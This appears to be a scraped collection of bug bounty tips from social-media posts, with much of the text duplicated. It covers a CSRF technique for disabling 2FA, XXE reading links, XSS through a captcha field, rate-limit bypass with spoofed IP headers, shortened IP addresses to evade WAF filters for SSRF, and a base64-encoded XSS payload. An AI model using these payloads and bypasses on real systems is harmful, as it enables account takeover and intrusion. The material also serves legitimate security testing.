CSRF for disabling 2FA
1. Capture request in burpsuite
2. Engagement tools> Generate CSRF POC
3. Pass null chars in token value so function will over-ride
4. Submit twice for overriding
5. 2FA disabled
1. Capture request in burpsuite
2. Engagement tools> Generate CSRF POC
3. Pass null chars in token value so function will over-ride
4. Submit twice for overriding
5. 2FA disabled
#XXE
https://spaceraccoon.dev/a-tale-of-two-formats-exploiting-insecure-xml-and-zip-file-parsers-to-create-a
https://0xatul.github.io/posts/2020/02/external-xml-entity-via-file-upload-svg/
https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html
https://github.com/setuid0-sec/Swiss_E-Voting_Publications/blob/master/xxe_setuid0.pdf
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/
https://corben.io/XSS-to-XXE-in-Prince/
https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
#bugbounty,#bugbountytips
https://spaceraccoon.dev/a-tale-of-two-formats-exploiting-insecure-xml-and-zip-file-parsers-to-create-a
https://0xatul.github.io/posts/2020/02/external-xml-entity-via-file-upload-svg/
https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html
https://github.com/setuid0-sec/Swiss_E-Voting_Publications/blob/master/xxe_setuid0.pdf
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/
https://corben.io/XSS-to-XXE-in-Prince/
https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
#bugbounty,#bugbountytips
spaceraccoon.dev
A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell
While researching a bug bounty target, I came across a web application that processed a custom file type which was actually just a ZIP file that contains an XML that functions as a manifest. If handled naively, this packaging pattern creates additional security…
Recently found a RXSS in captcha response
Resolve captcha --> capture request --> change captcha response to XSS payload --> XSS trigger
#BugBounty #BugBountyTip #BugBountyTips
Resolve captcha --> capture request --> change captcha response to XSS payload --> XSS trigger
#BugBounty #BugBountyTip #BugBountyTips
https://research.nccgroup.com/2020/03/19/ldapfragger-bypassing-network-restrictions-using-ldap-attributes/
https://github.com/fox-it/LDAPFragger
https://github.com/fox-it/LDAPFragger
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Bugbounty tips#3
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Payload xss en aplicación de javascript.
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips